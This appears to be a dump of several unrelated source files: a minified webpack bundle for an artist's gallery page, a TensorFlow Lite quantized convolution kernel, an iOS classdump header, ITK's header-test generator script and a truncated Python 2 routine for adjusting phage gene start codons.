text
stringlengths 3
1.05M
|
---|
(window.webpackJsonp=window.webpackJsonp||[]).push([[5],{"6A4u":function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"galleryWrapper__GalleryWrapper",componentId:"sc-1vq4w0i-0"})(["display:flex;flex-wrap:wrap;justify-content:center;align-items:center;margin:50px auto 0;width:100%;","{margin:20px auto;}"],i.a.phone)},"6BWh":function(e,t,a){"use strict";a.r(t),a.d(t,"query",(function(){return w}));a("f3/d");var n=a("q1tI"),i=a.n(n),o=a("yBb5"),r=a("Wbzz"),l=a("WC/B"),s=a("RJI5"),p=a("6A4u"),c=a("7O1Q"),d=a("fGBs"),u=a("AP/y"),m=a("GoKU"),f=a("XX2/"),g=a("DffI"),h=a("hmSs"),x=a("Kz2E"),b=a("lq3F"),w="2244380036";t.default=function(e){var t=e.data;return i.a.createElement(o.a,null,i.a.createElement(l.a,null,t.allDataJson.edges[4].node.name),i.a.createElement(s.a,null,i.a.createElement(b.a,null,i.a.createElement(r.a,{to:t.allDataJson.edges[3].node.url}," ",i.a.createElement("span",null," ←")),i.a.createElement(r.a,{to:"/"}," home "),i.a.createElement(r.a,{to:t.allDataJson.edges[5].node.url}," ",i.a.createElement("span",null," →"))),i.a.createElement(p.a,null,i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img1.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img1Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img2.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img2Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img3.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img3Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img4.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img4Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{bigScale:!0,src:"/artists/ana2img5.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img5Description)),i.a.createElement(c.a,null," 
",i.a.createElement(d.a,{src:"/artists/ana2img6.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img6Description))),i.a.createElement(m.a,null,i.a.createElement(h.a,null,t.allDataJson.edges[4].node.title),i.a.createElement(x.a,{as:"a",href:"http://anaalmeidapinto.com"},t.allDataJson.edges[4].node.website),i.a.createElement(f.a,null,i.a.createElement("p",null,"Como materializar objetos e propostas artísticas na era dos suportes digitais? Como encontrar formatos disruptivos para discursos em ambientes virtuais? Como converter o observador em comissário, exaltando a sua participação na criação e interpretação? Como investigar a apropriação nos processos escultóricos contemporâneos de forma activa e consciente, cedendo ao processo do fazer toda a significação e partindo de um pressuposto de partilha e diálogo entre autor, objecto e público? Onde se esbate a linha de apropriação, na forma, na linguagem, no espaço? Quem é realmente o autor se a interpretação é múltipla? Como incorporar a noção de território neste contexto de confinamento? Será o nosso território pessoal um símbolo global? Poderá o processo de fazer constituir um espelho desse território? Quais as suas margens? E de que forma podemos ainda acrescentar uma crítica social que espelhe o passado, presente e futuro que vivemos? Prec(ç)ário é uma escultura que acontece no campo expandido entre o mundo digital e o ambiente doméstico de todos os que participam, apropriando espaços e objectos domésticos para interpretar a relação desigual entre o cidadão e o sistema financeiro. Cada interpretação terá a sua leitura e a sua narrativa, e todas as partes compões o todo, sempre em crescimento e sempre em evolução.")),i.a.createElement(g.a,null,i.a.createElement("p",null,"How to materialize objects and artistic proposals in the era of digital media? How to find disruptive formats for speeches in virtual environments? 
How to convert the observer into a commissioner, extolling his participation into creation and interpretation? How to investigate appropriation in contemporary sculptural processes in an active and conscious way, yielding all meaning to the process of making and starting from an assumption of sharing and dialogue between author, object and audience? Where does the appropriation line fade, in form, in language, in space? Who is really the author if the interpretation is multiple? How to incorporate the notion of territory in this context of confinement? Is our personal territory a global symbol? Can the process of making be a mirror of that territory? What are its margins? And how can we add a social critique that reflects the past, present and future we live in? Prec(ç)ário is a sculpture that takes place in the expanded field between the digital world and the home environment of all who participate, appropriating spaces and domestic objects to interpret the unequal relationship between the citizen and the financial system. 
Each interpretation will have its reading and its narrative, as all parts make up the whole, always growing and always evolving.")))),i.a.createElement(r.a,{to:t.allDataJson.edges[4].node.url,className:"scrollTopButton"}," ",i.a.createElement("span",null," ←"),"to the top"))}},"7O1Q":function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"imageWrapper__ImageWrapper",componentId:"tx2eqf-0"})(["display:flex;padding-bottom:10px;flex-direction:column;width:",";margin:0 auto;audio{margin:0 auto;}","{width:80%;}","{width:100%;}"],(function(e){return e.isBig?"61%":"40%"}),i.a.tablet,i.a.phone)},"AP/y":function(e,t,a){"use strict";a.d(t,"a",(function(){return n}));var n=a("vOnD").b.p.withConfig({displayName:"imageTitle__ImageTitle",componentId:"sc-1lp9rba-0"})(["width:60%;font-size:10px;height:100px;margin:0 auto;"])},DffI:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"textNoBorder__TextNoBorder",componentId:"sc-1zezrd-0"})(["display:flex;flex-direction:column;flex-wrap:wrap;width:100%;padding:50px;p{font-size:15px;text-align:",";}","{padding:10px;width:100% !important;}"],(function(e){return e.alignLeft?"left":"right"}),i.a.phone)},GoKU:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"textWrapper__TextWrapper",componentId:"sc-15mzljr-0"})(["display:flex;font-weight:300;flex-direction:column;text-align:",";flex-wrap:wrap;padding:50px;width:100%;","{padding:20px;}","{padding:5px;}"],(function(e){return e.centered?"center":"right"}),i.a.tablet,i.a.phone)},Kz2E:function(e,t,a){"use strict";a.d(t,"a",(function(){return r}));var n=a("vOnD"),i=a("5RMe"),o=a("uZbd"),r=n.b.h3.withConfig({displayName:"website__Website",componentId:"ryjd4v-0"})(['font-family:"Montserrat";font-weight:300;width:100%;color:',";height:50px;font-size:20px;padding:0 
50px;","{font-size:15px;}","{padding:0;}"],i.a.greyDark,o.a.tablet,o.a.phone)},RJI5:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"mainWrapper__MainWrapper",componentId:"sc-197er53-0"})(["display:flex;flex-direction:column;width:80%;margin:0 auto;","{width:100%;}"],i.a.phone)},"WC/B":function(e,t,a){"use strict";a.d(t,"a",(function(){return r}));var n=a("vOnD"),i=a("5RMe"),o=a("uZbd"),r=n.b.h1.withConfig({displayName:"H1",componentId:"ulmasc-0"})(['font-size:35px;font-family:"Montserrat";font-weight:400;text-align:right;transform:rotate(270deg);position:absolute;top:400px;left:-150px;width:500px;height:100px;',"{font-size:30px;left:-180px;}",'{width:100%;position:absolute;height:50px;top:50px;left:0;right:50%;padding-right:5px;font-size:20px;margin:50px auto 0;transform:none;}:before{content:"";width:100%;height:3px;background-color:',";position:absolute;top:25px;right:500px;","{top:10px;right:0px;width:100%;}}"],o.a.tablet,o.a.phone,i.a.yellow,o.a.phone)},Wbzz:function(e,t,a){"use strict";a.d(t,"b",(function(){return p}));a("xfY5");var n=a("q1tI"),i=a.n(n),o=a("+ZDr"),r=a.n(o);a.d(t,"a",(function(){return r.a}));a("lw3w"),a("emEt").default.enqueue;var l=i.a.createContext({});function s(e){var t=e.staticQueryData,a=e.data,n=e.query,o=e.render,r=a?a.data:t[n]&&t[n].data;return i.a.createElement(i.a.Fragment,null,r&&o(r),!r&&i.a.createElement("div",null,"Loading (StaticQuery)"))}var p=function(e){var t=e.data,a=e.query,n=e.render,o=e.children;return i.a.createElement(l.Consumer,null,(function(e){return i.a.createElement(s,{data:t,query:a,render:n||o,staticQueryData:e})}))}},"XX2/":function(e,t,a){"use strict";a.d(t,"a",(function(){return r}));var n=a("vOnD"),i=a("uZbd"),o=a("5RMe"),r=n.b.div.withConfig({displayName:"textWithBorder__TextWithBorder",componentId:"s1ei68-0"})(["border:3px solid 
",";display:flex;flex-direction:column;flex-wrap:wrap;width:100%;padding:50px;p{font-size:15px;text-align:",";}","{padding:20px;}","{padding:10px;}"],o.a.greyLight,(function(e){return e.alignLeft?"left":"right"}),i.a.tablet,i.a.phone)},fGBs:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.img.withConfig({displayName:"styledImage__StyledImage",componentId:"sc-8ae8dm-0"})(["width:90%;max-height:700px;height:auto;padding:0 0 10px 20px;object-fit:contain;margin:0 auto;transition:all 0.6s ease-in-out;","{padding:0 0 10px 0;}&:hover{transform:scale(1.4);transform:",";","{transform:none;}}"],i.a.phone,(function(e){return e.bigScale?"scale(1.7)":"scale(1.3)"}),i.a.phone)},hmSs:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.h2.withConfig({displayName:"titleOfWork__TitleOfWork",componentId:"sc-1hka23r-0"})(['font-family:"Montserrat";width:100%;font-size:30px;padding:0 50px 0 200px;',"{font-size:20px;padding:0 50px 0 0;}","{padding:0;}"],i.a.tablet,i.a.phone)},lq3F:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.nav.withConfig({displayName:"navMainWrapper__NavMainWrapper",componentId:"sc-1dk3hrj-0"})(['margin:30px auto 100px;display:flex;position:relative;flex-wrap:wrap;font-size:15px;width:100%;font-family:"Montserrat";justify-content:space-between;',"{padding:0 10px 0 10px;}"],i.a.phone)},lw3w:function(e,t,a){var n;e.exports=(n=a("rzlk"))&&n.default||n},rzlk:function(e,t,a){"use strict";a.r(t);a("91GP");var n=a("q1tI"),i=a.n(n),o=a("IOVJ");t.default=function(e){var t=e.location,a=e.pageResources;return a?i.a.createElement(o.a,Object.assign({location:t,pageResources:a},a.json)):null}},xfY5:function(e,t,a){"use strict";var n=a("dyZX"),i=a("aagx"),o=a("LZWt"),r=a("Xbzi"),l=a("apmT"),s=a("eeVq"),p=a("kJMx").f,c=a("EemH").f,d=a("hswa").f,u=a("qncB").trim,m=n.Number,f=m,g=m.prototype,h="Number"==o(a("Kuth")(g)),x="trim"in 
String.prototype,b=function(e){var t=l(e,!1);if("string"==typeof t&&t.length>2){var a,n,i,o=(t=x?t.trim():u(t,3)).charCodeAt(0);if(43===o||45===o){if(88===(a=t.charCodeAt(2))||120===a)return NaN}else if(48===o){switch(t.charCodeAt(1)){case 66:case 98:n=2,i=49;break;case 79:case 111:n=8,i=55;break;default:return+t}for(var r,s=t.slice(2),p=0,c=s.length;p<c;p++)if((r=s.charCodeAt(p))<48||r>i)return NaN;return parseInt(s,n)}}return+t};if(!m(" 0o1")||!m("0b1")||m("+0x1")){m=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof m&&(h?s((function(){g.valueOf.call(a)})):"Number"!=o(a))?r(new f(b(t)),a,m):b(t)};for(var w,v=a("nh4g")?p(f):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),y=0;v.length>y;y++)i(f,w=v[y])&&!i(m,w)&&d(m,w,c(f,w));m.prototype=g,g.constructor=m,a("KroJ")(n,"Number",m)}},yBb5:function(e,t,a){"use strict";a.d(t,"a",(function(){return g}));var n=a("q1tI"),i=a.n(n),o=a("vOnD"),r=a("Wbzz"),l=a("uZbd"),s=o.b.nav.withConfig({displayName:"BottomNavArtistPage__NavigationWrapper",componentId:"f9l4bm-0"})(['margin:50px auto 50px;display:flex;flex-wrap:wrap;font-size:15px;width:60%;font-family:"Montserrat";font-weight:300;',"{width:100%;margin:0 auto;}"],l.a.phone),p=o.b.ul.withConfig({displayName:"BottomNavArtistPage__NavigationList",componentId:"f9l4bm-1"})(["margin:0;display:flex;justify-content:space-between;width:100%;list-style:none;","{display:block;padding:0;margin-bottom:50px;}"],l.a.phone),c=o.b.li.withConfig({displayName:"BottomNavArtistPage__NavigationListItem",componentId:"f9l4bm-2"})(["padding-top:10px;width:30%;text-align:center;text-decoration:none;color:inherit;","{width:100%;padding-top:30px;}a{text-decoration:none;color:inherit;}"],l.a.phone),d=o.b.li.withConfig({displayName:"BottomNavArtistPage__NavigationListItemUp",componentId:"f9l4bm-3"})(["padding:20px;border-bottom:1px black 
solid;width:60%;margin:0 auto;text-align:center;color:inherit;list-style:none;"]),u=function(){return i.a.createElement(s,null,i.a.createElement(d,null,"2020"),i.a.createElement(p,null,i.a.createElement(c,null,i.a.createElement(r.a,{to:"/textPt"},"text PT /"),i.a.createElement(r.a,{to:"/textEn"}," ENG")),i.a.createElement(c,null,i.a.createElement(r.a,{to:"/credits"},"credits"))))},m=a("1gFo"),f=o.b.div.withConfig({displayName:"Layout__LayoutWrapper",componentId:"sc-1bu8igz-0"})(["margin:0 auto;text-align:center;display:flex;flex-wrap:wrap;padding:0 auto;position:relative;","{margin:0 auto;display:block;padding:0;}"],l.a.phone);function g(e){var t=e.children;return i.a.createElement(i.a.Fragment,null,i.a.createElement(m.a,null),i.a.createElement(f,null,t,i.a.createElement(u,null)))}}}]);
//# sourceMappingURL=component---src-pages-ana-2-js-64d12b38cea206a8a0ef.js.map |
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_LITE_KERNELS_INTERNAL_REFERENCE_INTEGER_OPS_CONV_H_
#define TENSORFLOW_LITE_KERNELS_INTERNAL_REFERENCE_INTEGER_OPS_CONV_H_
#include "tensorflow/lite/kernels/internal/common.h"
namespace tflite {
namespace reference_integer_ops {
// Fixed-point per-channel-quantization convolution reference kernel.
inline void ConvPerChannel(
const ConvParams ¶ms, const int32_t *output_multiplier,
const int32_t *output_shift, const RuntimeShape &input_shape,
const int8_t *input_data, const RuntimeShape &filter_shape,
const int8_t *filter_data, const RuntimeShape &bias_shape,
const int32_t *bias_data, const RuntimeShape &output_shape,
int8_t *output_data)
{
// Get parameters.
const int32_t input_offset = params.input_offset; // r = s(q - Z)
const int stride_width = params.stride_width;
const int stride_height = params.stride_height;
const int dilation_width_factor = params.dilation_width_factor;
const int dilation_height_factor = params.dilation_height_factor;
const int pad_width = params.padding_values.width;
const int pad_height = params.padding_values.height;
const int32_t output_offset = params.output_offset;
// Set min and max value of the output.
const int32_t output_activation_min = params.quantized_activation_min;
const int32_t output_activation_max = params.quantized_activation_max;
// Consistency check.
TFLITE_DCHECK_LE(output_activation_min, output_activation_max);
TFLITE_DCHECK_EQ(input_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(filter_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(output_shape.DimensionsCount(), 4);
const int batches = MatchingDim(input_shape, 0, output_shape, 0);
const int input_depth = MatchingDim(input_shape, 3, filter_shape, 3);
const int output_depth = MatchingDim(filter_shape, 0, output_shape, 3);
if (bias_data) {
TFLITE_DCHECK_EQ(bias_shape.FlatSize(), output_depth);
}
// Check dimensions of the tensors.
const int input_height = input_shape.Dims(1);
const int input_width = input_shape.Dims(2);
const int filter_height = filter_shape.Dims(1);
const int filter_width = filter_shape.Dims(2);
const int output_height = output_shape.Dims(1);
const int output_width = output_shape.Dims(2);
for (int batch = 0; batch < batches; ++batch) {
for (int out_y = 0; out_y < output_height; ++out_y) {
const int in_y_origin = (out_y * stride_height) - pad_height;
for (int out_x = 0; out_x < output_width; ++out_x) {
const int in_x_origin = (out_x * stride_width) - pad_width;
for (int out_channel = 0; out_channel < output_depth; ++out_channel) {
int32_t acc = 0;
for (int filter_y = 0; filter_y < filter_height; ++filter_y) {
const int in_y = in_y_origin + dilation_height_factor * filter_y;
for (int filter_x = 0; filter_x < filter_width; ++filter_x) {
const int in_x = in_x_origin + dilation_width_factor * filter_x;
// Zero padding by omitting the areas outside the image.
const bool is_point_inside_image =
(in_x >= 0) && (in_x < input_width) && (in_y >= 0) &&
(in_y < input_height);
if (!is_point_inside_image) {
continue;
}
for (int in_channel = 0; in_channel < input_depth; ++in_channel) {
int32_t input_val = input_data[Offset(input_shape, batch, in_y,
in_x, in_channel)];
int32_t filter_val = filter_data[Offset(
filter_shape, out_channel, filter_y, filter_x, in_channel)];
// Accumulate with 32 bits accumulator.
// In the nudging process during model quantization, we force
// real value of 0.0 be represented by a quantized value. This
// guarantees that the input_offset is a int8_t, even though
// it is represented using int32_t. int32_t += int8_t *
// (int8_t - int8_t) so the highest value we can get from each
// accumulation is [-127, 127] * ([-128, 127] -
// [-128, 127]), which is [-32512, 32512]. log2(32512)
// = 14.98, which means we can accumulate at least 2^16
// multiplications without overflow. The accumulator is
// applied to a filter so the accumulation logic will hold as
// long as the filter size (filter_y * filter_x * in_channel)
// does not exceed 2^16, which is the case in all the models
// we have seen so far.
// TODO(b/174275578): Add a check to make sure the
// accumulator depth is smaller than 2^16.
acc += filter_val * (input_val + input_offset);
}
}
}
if (bias_data) {
acc += bias_data[out_channel];
}
acc = MultiplyByQuantizedMultiplier(
acc, output_multiplier[out_channel], output_shift[out_channel]);
acc += output_offset;
acc = std::max(acc, output_activation_min);
acc = std::min(acc, output_activation_max);
output_data[Offset(output_shape, batch, out_y, out_x, out_channel)] =
static_cast<int8_t>(acc);
}
}
}
}
}
// Fixed-point per-channel-quantization convolution reference kernel.
// 16-bit data and 8-bit filter
inline void ConvPerChannel(
const ConvParams ¶ms, const int32_t *output_multiplier,
const int32_t *output_shift, const RuntimeShape &input_shape,
const int16_t *input_data, const RuntimeShape &filter_shape,
const int8_t *filter_data, const RuntimeShape &bias_shape,
const std::int64_t *bias_data, const RuntimeShape &output_shape,
int16_t *output_data)
{
// Get parameters.
const int stride_width = params.stride_width;
const int stride_height = params.stride_height;
const int dilation_width_factor = params.dilation_width_factor;
const int dilation_height_factor = params.dilation_height_factor;
const int pad_width = params.padding_values.width;
const int pad_height = params.padding_values.height;
// Set min and max value of the output.
const int32_t output_activation_min = params.quantized_activation_min;
const int32_t output_activation_max = params.quantized_activation_max;
// Consistency check.
TFLITE_DCHECK_LE(output_activation_min, output_activation_max);
TFLITE_DCHECK_EQ(input_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(filter_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(output_shape.DimensionsCount(), 4);
const int batches = MatchingDim(input_shape, 0, output_shape, 0);
const int input_depth = MatchingDim(input_shape, 3, filter_shape, 3);
const int output_depth = MatchingDim(filter_shape, 0, output_shape, 3);
if (bias_data) {
TFLITE_DCHECK_EQ(bias_shape.FlatSize(), output_depth);
}
// Check dimensions of the tensors.
const int input_height = input_shape.Dims(1);
const int input_width = input_shape.Dims(2);
const int filter_height = filter_shape.Dims(1);
const int filter_width = filter_shape.Dims(2);
const int output_height = output_shape.Dims(1);
const int output_width = output_shape.Dims(2);
for (int batch = 0; batch < batches; ++batch) {
for (int out_y = 0; out_y < output_height; ++out_y) {
const int in_y_origin = (out_y * stride_height) - pad_height;
for (int out_x = 0; out_x < output_width; ++out_x) {
const int in_x_origin = (out_x * stride_width) - pad_width;
for (int out_channel = 0; out_channel < output_depth; ++out_channel) {
std::int64_t acc = 0;
for (int filter_y = 0; filter_y < filter_height; ++filter_y) {
const int in_y = in_y_origin + dilation_height_factor * filter_y;
for (int filter_x = 0; filter_x < filter_width; ++filter_x) {
const int in_x = in_x_origin + dilation_width_factor * filter_x;
// Zero padding by omitting the areas outside the image.
const bool is_point_inside_image =
(in_x >= 0) && (in_x < input_width) && (in_y >= 0) &&
(in_y < input_height);
if (!is_point_inside_image) {
continue;
}
for (int in_channel = 0; in_channel < input_depth; ++in_channel) {
int32_t input_val = input_data[Offset(input_shape, batch, in_y,
in_x, in_channel)];
int32_t filter_val = filter_data[Offset(
filter_shape, out_channel, filter_y, filter_x, in_channel)];
// Accumulate with 64 bits accumulator.
// int64_t += int8_t * int16_t so the highest value we can
// get from each accumulation is [-127, 127] * ([-32768,
// 32767] -
// [-32768, 32767]), which is [-8322945, 8322945].
// log2(8322945) = 22.99.
acc += filter_val * input_val;
}
}
}
if (bias_data) {
acc += bias_data[out_channel];
}
int32_t scaled_acc = MultiplyByQuantizedMultiplier(
acc, output_multiplier[out_channel], output_shift[out_channel]);
scaled_acc = std::max(scaled_acc, output_activation_min);
scaled_acc = std::min(scaled_acc, output_activation_max);
output_data[Offset(output_shape, batch, out_y, out_x, out_channel)] =
static_cast<int16_t>(scaled_acc);
}
}
}
}
}
} // namespace reference_integer_ops
} // namespace tflite
#endif // TENSORFLOW_LITE_KERNELS_INTERNAL_REFERENCE_INTEGER_OPS_CONV_H_
|
/*
* This header is generated by classdump-dyld 1.0
* on Tuesday, November 5, 2019 at 2:43:44 AM Mountain Standard Time
* Operating System: Version 13.0 (Build 17J586)
* Image Source: /System/Library/PrivateFrameworks/PhotosUICore.framework/PhotosUICore
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos.
*/
@class NSString;
// NOTE(review): header emitted by classdump-dyld from the private
// PhotosUICore framework (iOS 13); not hand-written API.
// Conformers expose an opaque, copied, read-only string identifier.
@protocol PXBarItem <NSObject>
@property (nonatomic,copy,readonly) NSString * identifier;
@required
// Redundant with the readonly @property's implied getter above -- a
// classdump generator artifact, kept byte-identical.
-(NSString *)identifier;
@end
|
#!/usr/bin/env python
# ==========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ==========================================================================*/
from __future__ import print_function
# Help text printed when the script is invoked with too few arguments.
# Fixed: the original omitted the required fifth argument (<test_number>,
# read from argv[5] and enforced by the len(sys.argv) < 6 guard below)
# and contained the doubled-word typo "a a source file".
usage = """usage: BuildHeaderTest.py <module_name> <module_source_path> <module_binary_path> <maximum_number_of_headers> <test_number>
This script generates a source file designed to check the headers in each
module. The generated HeaderTest can be found in the module binary 'test'
directory in a file itk<module_name>HeaderTest#.cxx. This contains a null
main(), but includes all the classes in the module. The primary purpose of this
test is to make sure there are not missing module dependencies. It also tests
for syntax and missing #include's.
"""
# Headers excluded from the generated test: dependency problems,
# deprecations, and compatibility shims (see the per-entry notes).
BANNED_HEADERS = {
    "itkDynamicLoader.h",  # This cannot be included when ITK_DYNAMIC_LOADING is OFF
    "itkExceptionObject.h",  # There is a pre-processor check so people use itkMacro.h instead.
    "itkFFTWForwardFFTImageFilter.h",
    "itkFFTWInverseFFTImageFilter.h",
    "itkFFTWRealToHalfHermitianForwardFFTImageFilter.h",
    "itkFFTWHalfHermitianToRealInverseFFTImageFilter.h",
    "itkFFTWComplexToComplexFFTImageFilter.h",
    "itkFFTWCommon.h",
    "itkPyBuffer.h",  # needs Python.h, etc
    "itkPyVnl.h",  # needs Python.h, etc
    "itkPyVectorContainer.h",  # needs Python.h, etc
    "itkVanHerkGilWermanErodeDilateImageFilter.h",  # circular include's
    "itkBSplineDeformableTransform.h",  # deprecated
    "vtkCaptureScreen.h",  # these includes require VTK
    "itkMultiThreader.h",  # Compatibility file, it should not be used
    "itkEnableIf.h",  # Compatibility file, it should not be used
    "itkIsSame.h",  # Compatibility file, it should not be used
    "itkIsBaseOf.h",  # Compatibility file, it should not be used
    "itkIsConvertible.h",  # Compatibility file, it should not be used
    "itkViewImage.h",  # Depends on VTK_RENDERING_BACKEND
    "QuickView.h",  # Depends on VTK_RENDERING_BACKEND
    "itkBSplineDeformableTransformInitializer.h",
}
# C++ preamble written at the top of every generated HeaderTest source
# file (license banner + provenance note). Runtime string: byte-identical.
HEADER = """/*=========================================================================
*
* Copyright NumFOCUS
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0.txt
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*=========================================================================*/
// This file has been generated by BuildHeaderTest.py
// To regenerate, build the ITKHeaderTests target.
// This is a test to include each header file for Insight.
"""
# C++ epilogue appended after the #include list: a trivial main() so the
# generated translation unit links and runs as a no-op test.
TRAILER = """
#include <cstdlib> // needed for EXIT_SUCCESS macro
int main ( int , char* [] )
{
return EXIT_SUCCESS;
}
"""
import glob
import os
import sys
# Fail fast at import time: five CLI arguments are required
# (module_name, module_source_path, module_binary_path,
# maximum_number_of_headers, test_num -- consumed by main() below).
if len(sys.argv) < 6:
    print(usage)
    sys.exit(1)
def main():
    """Generate itk<module_name>HeaderTest<N>.cxx for one slice of headers.

    Command-line arguments (validated at import time above):
      argv[1] module_name, argv[2] module_source_path,
      argv[3] module_binary_path, argv[4] maximum_number_of_headers,
      argv[5] test_num (1-based index of the slice to emit).

    Returns 0 on success. Creates <module_binary_path>/test if missing.
    """
    module_name = sys.argv[1]
    module_source_path = sys.argv[2]
    module_binary_path = sys.argv[3]
    maximum_number_of_headers = int(sys.argv[4])
    test_num = int(sys.argv[5])

    # Get all the header files. Sorted so the header-to-test assignment is
    # deterministic across platforms (glob's order is arbitrary).
    include_dir = os.path.join(module_source_path, "include")
    h_files = sorted(
        os.path.basename(h) for h in glob.glob(os.path.join(include_dir, "*.h"))
    )

    # This invocation emits the half-open slice
    # [added_header_idx, max_idx) of h_files. min() replaces the original
    # modulo arithmetic: equivalent for valid test_num, and safe (empty
    # slice instead of bogus indices) for an out-of-range test_num.
    added_header_idx = maximum_number_of_headers * (test_num - 1)
    max_idx = min(added_header_idx + maximum_number_of_headers, len(h_files))

    test_source_path = os.path.join(module_binary_path, "test")
    if not os.path.exists(test_source_path):
        os.makedirs(test_source_path)
    test_source_file = os.path.join(
        test_source_path, str(module_name) + "HeaderTest" + str(test_num) + ".cxx"
    )

    # `with` guarantees the file is closed on any error
    # (replaces the original try/finally).
    with open(test_source_file, "w") as test_src:
        test_src.write(HEADER)
        for i in range(added_header_idx, max_idx):
            # Banned headers, and files that include VTK headers (which
            # would need to link to VTK), are emitted commented out.
            if h_files[i] in BANNED_HEADERS or h_files[i].lower().find("vtk") != -1:
                to_include = (
                    '// #include "' + h_files[i] + '" // Banned in BuildHeaderTest.py\n'
                )
            else:
                to_include = '#include "' + h_files[i] + '"\n'
            test_src.write(to_include)
        test_src.write(TRAILER)
    return 0
if __name__ == "__main__":
    # Run the generator and hand its status straight to the shell.
    sys.exit(main())
|
from functions import *
import argparse
def updateStart(db, gene_id, newStart, rev_comp):
    """Persist an adjusted gene start position and flag the row adjusted=1.

    For a forward-strand gene the `start` column is rewritten; for a
    reverse-complement gene the biological start lives in `end`.
    Commits immediately.
    """
    # int() coercion guarantees the interpolated values are plain integers,
    # closing the SQL-injection hole left by the old raw str() concatenation.
    # (The DB driver's paramstyle is unknown from this file, so bound
    # placeholders are deliberately not used -- TODO confirm driver and
    # switch to parameterized queries.)
    gid = int(gene_id)
    new_start = int(newStart)
    # NOTE(review): the original `== False` test is kept on purpose --
    # rev_comp looks like a DB-sourced 0/1 flag, and any non-False value
    # (including None) falls through to the `end` branch exactly as before.
    if rev_comp == False:
        column = "start"
    else:
        column = "end"
    cur = db.cursor()
    cur.execute("UPDATE gene SET %s = %d, adjusted = 1 WHERE id = %d"
                % (column, new_start, gid))
    db.commit()
def findBestStart(db, gene, potentialStarts, ideal_move_distance):
    # Choose one of `potentialStarts` relative to the ideal move distance
    # (codons; converted to nucleotides via *3 below).
    # NOTE(review): several suspicious points to confirm before trusting
    # this function:
    #   * `check` is computed but never used -- the diffs below compare the
    #     raw start coordinates against `imd`, not the distance moved.
    #   * np.argmax selects the start FARTHEST from the ideal distance;
    #     argmin (closest) seems more likely to be the intent.
    print potentialStarts
    if gene['rev_comp']:
        check = gene['end']
    else:
        check = gene['start']
    imd = ideal_move_distance * 3  # codons -> nucleotides
    diffs = [np.abs(s - imd) for s in potentialStarts]
    return potentialStarts[np.argmax(diffs)]
def tooLongForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
    """Shorten a too-long forward-strand gene by scanning downstream
    (increasing coordinates) for an alternative start codon.

    Returns (closeBestGeneStart, farBestGeneStart): the last start codon
    found within `ideal_move_distance` codons, and the first one found
    beyond it. Either may be None. Scanning stops at a stop codon.
    """
    # Init bestGeneStart
    farBestGeneStart = None
    closeBestGeneStart = None
    # The genome does not change between iterations; fetch it once instead
    # of re-querying the database for every candidate codon (the original
    # called get_phage inside the loop).
    phage = get_phage(db, gene['phage_id'])
    phageGenome = phage['seq']
    # Run through all the potential starts
    for i in xrange(1, ideal_move_distance * 2):  # doubled so we have equal search space on both sides
        currentStart = gene['start'] + (3 * i)  # increase our start 3 at a time
        codon = phageGenome[currentStart:currentStart + 3]  # codon is going forward
